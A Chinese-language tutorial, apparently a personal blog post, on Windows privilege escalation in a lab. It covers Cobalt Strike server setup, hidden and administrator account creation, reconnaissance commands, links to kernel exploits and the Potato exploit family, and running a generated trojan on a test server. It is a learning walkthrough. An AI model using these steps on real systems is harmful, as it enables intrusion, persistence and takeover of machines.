文章目录
一、安装CS
这里我将kali作为服务端,本机作为客户端
分别下载文件
执行指令
cd Server
chmod +x teamserver
chmod +x TeamServerImage
kali启动服务端(ip地址是服务端kali的IP地址)
./teamserver [服务端IP地址] [服务端连接密码]
然后启动客户端
点击Cobalt_Strike_CN.bat,host填服务端的地址,port为端口填一个不常用的,user为用户名,password就为服务端设置的密码
下图连接成功!
点击“Cobalt Strike”,选择“脚本服务器”,点击“Load”,在plugin目录中找到后缀为na的插件文件添加(需要欧拉、梼杌、谢公子、巨龙拉东4个插件)。
二、用户组和用户、windows信息搜集命令
1.Windows用户组和用户命令
net user zs pass /add 新增用户
net user zs /del 删除用户
net user zs$ pass /add 新增隐藏用户
net localgroup worker /add 新增用户组
net localgroup worker /del 删除用户组
net localgroup worker zs /add 添加用户到用户组
net localgroup worker zs /del 从用户组中删除用户
net localgroup administrator zs /add 将普通用户添加到管理员用户(提权)
2.windows信息搜集命令
systeminfo 打印系统信息
whoami 获得当前用户名
whoami /priv 当前帐户权限
ipconfig 网络配置信息
ipconfig /displaydns 显示DNS缓存
route print 打印出路由表
arp -a 打印arp表
hostname 主机名
net user 列出用户
net user UserName 关于用户的信息
net localgroup 列出所有组
net localgroup GROUP 关于指定组的信息
tasklist /svc 列出服务任务
net start 列出启动的服务
三、手工提权思路和土豆提权
1.手工提权思路
首先获取对方的系统信息,通过命令systeminfo获取。
将系统信息使用wesng查看系统存在哪些补丁没有打上
然后通过查询这些漏洞进行利用,提权。
补丁查询:
https://github.com/Ascotbe/Kernelhub
http://kernelhub.ascotbe.com/Windows/Docs/#/
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/nomi-sec/PoC-in-GitHub
https://gitlab.com/exploit-database/exploitdb
2.土豆提权
这里用的是本机
使用土豆家族挨个上传提权,不成功就多再试几个
土豆家族
https://github.com/BeichenDream/BadPotato
https://github.com/BeichenDream/GodPotato
https://github.com/CCob/SweetPotato
https://github.com/klezVirus/CandyPotato
https://github.com/antonioCoco/RoguePotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
https://github.com/crisprss/RasmanPotato
https://github.com/wh0amitz/PetitPotato
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/BeichenDream/PrintNotifyPotato
https://github.com/Prepouce/CoercedPotato
这里我用的是godpotato提权成功的
四、CS插件提权
首先配置了一下靶机winserver2012
然后开启CS服务端和客户端,双击安装目录下的Cobalt_Strike_CN.vbs,输入Host和Password,点击“Connect”等待连接成功
设置listener,端口不要设置冲突
点击“有效载荷”,选择windows可执行文件,生成木马
将木马文件传输到winserver2012,并点击木马
为了提高测试效率,设置“回连间隔”,右键点击
选择“会话交互”打开命令行,使用梼杌中的getsystem进行提权
输入shell whoami就可以看到提权成功